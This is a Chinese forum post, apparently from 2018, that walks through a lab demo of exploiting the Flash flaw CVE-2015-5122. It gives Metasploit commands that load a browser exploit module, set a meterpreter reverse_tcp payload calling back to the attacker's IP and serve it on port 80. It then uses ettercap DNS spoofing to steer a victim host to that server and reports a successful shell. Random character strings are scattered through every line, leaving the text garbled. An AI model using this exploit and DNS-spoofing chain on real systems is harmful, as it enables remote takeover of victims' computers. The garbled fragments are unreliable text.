找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1547|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

' n/ R4 A1 v& _+ L) G/ r' K* k 二、cve2015-5122漏洞实例演示虚拟机 ! A' H% a1 v: h8 D+ F- T0 O

7 J8 w8 ~2 A: F; M8 R/ ^5 R( m

! m7 C/ V6 {4 R* ^& g1 Z3 Y0 T   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: ! K% d7 Q/ u6 }0 T. V

3 T9 F. d' ~& \, u! P

5 i9 l: t3 U9 K9 T; E search cve-2015-5122如图: 4 V' C7 |7 v" q

v$ ~1 V2 D* T% R& Y( |

* i! p6 D& v+ ?/ R   # g1 F: d) o7 j2 T

) Q$ y! n1 ]( I# O1 i6 e

7 o/ F4 [3 d! X. f% C1 ?+ C 下面我们敲如下命令: 6 u9 b" x; \8 Q1 }

+ T5 }; _3 g) N" ^+ W7 ^

5 h0 n# I0 ` K; h! s use exploit/multi/browser/adobe_flash_opaque_background_uaf 0 U) D7 V- k a5 I

. \2 `& N: e- l; z0 H! @ d

9 w! V8 J6 ?- z, ^, E' c$ q set PAYLOAD windows/meterpreter/reverse_tcp c* d: M ^ Q) G3 [& h/ o

5 G' }8 m! g: D2 u

3 c2 ~- @% I# [* \1 Z set LHOST 192.168.0.109 $ Z% S7 A4 ^! R6 k7 X: r, U

9 y& `- N! n C4 G* B% H

; \, A/ @; O3 r* |- z' C set URIPATH /                        /*根目录*/ L4 R! z. c; A! C/ w

2 \2 q5 E4 P# x: U( B4 ]1 Z' v

, I" h4 `# E' Q& { set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 : |5 Q. B& J* [

, N2 ~ w$ v) l7 {5 q

. X+ z/ Q2 J0 T' ^7 o, p set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ( r4 K4 U6 O; K

" y' r$ a: ~- Y+ B; L n

* |- S5 u/ p% p& ] D# r' P% `- D! M 然后show options如图: / m7 p6 @5 w- w: e3 z' c1 L& v

0 S" \3 V- Y+ L/ v8 R$ J

& z# d6 e( a' _4 [) R, k* u   : A7 ]* h% x( p% ]/ H

4 v/ \3 Y% X' T$ D

5 y9 C; g" w. K" i" ^ 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
|8 J" F' |/ Q1 h9 P. D
6 S* p% F) I! J$ E

1 P% D7 \9 j1 \( |4 a% t

4 X3 _2 Q6 E6 a, V 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 + M0 S: |- ~, n( r

5 o( A; G! T3 p; \

2 d& [. D6 E' Z; ?* Y, T Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf ! x. u) T% P% J. X% q* M

2 }5 J" H' J7 k8 u8 N

4 i* {3 X( _# `3 i! W   9 e7 a/ s. R: U- u6 @

& `2 \+ x, Y& K: H# o

7 n/ ]$ S7 P/ W4 M 成功了,这时候我们断开ettercap,如图: 2 \" t! w3 m# t8 X% h5 @, u* l

/ F# P. y2 R4 A% ~9 Z' r

8 o. i# z! d+ f+ T" W   ( \: J, ^1 j3 F) \

) P8 X/ W3 o7 F" i I: _* B

8 \' f2 ?, d) b8 r5 z2 x# M# Q Screenshot如图: ; [# O; n) Z$ x% J! `8 d6 S

: a/ u5 s* l) [( s3 g8 V' s3 @. B

% a( ]1 k' v7 t/ H: r; K   $ N# O4 L4 m- a& t8 A9 U' @3 u9 ?

H7 z, F% u8 {: o

: V, f0 W# @8 `1 G5 M+ _" {4 r 4 j2 y# a+ [$ k/ v5 t* ^

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表